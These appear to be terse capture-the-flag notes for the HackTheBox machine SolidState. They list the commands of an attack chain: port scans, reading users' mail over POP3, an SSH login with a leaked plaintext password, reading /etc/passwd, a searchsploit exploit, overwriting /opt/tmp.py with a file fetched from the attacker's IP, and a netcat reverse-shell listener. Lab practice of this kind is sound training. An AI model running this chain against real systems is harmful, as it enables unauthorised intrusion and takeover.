echo "10.129.29.189 solidstate.htb" | sudo tee -a /etc/hosts
nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.129.29.189
nmap -p 22,25,80,110,119,4555 -sC -sV -oA scans/nmap-tcpscripts 10.129.29.189
rustscan --accessible -a solidstate.htb -r 1-65535 -- -sT -sV -sC -Pn
gobuster dir -u http://10.129.29.189/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html -o scans/gobuster-root-html-small -t 40
nc -v solidstate.htb 4555
POP3 telnet solidstate.htb 110 USER john PASS test LIST
#to read email RETR 1
telnet solidstate.htb 110 USER mindy PASS test LIST RETR 1
RETR 2
ssh mindy@10.129.29.189 -t bash P@55W0rd1!2@
#you can see mindys shell is rbash cat /etc/passwd
searchsploit james searchsploit -m linux/remote/35513.py
ls -l /opt/ cat /opt/tmp.py
python3 -m http.server 8888
cat tmp.py
cd /tmp wget http://10.10.14.123:8000/tmp.py cp tmp.py /opt/tmp.py
nc -lvnp 4444
![[Pasted image 20210304212555.png]]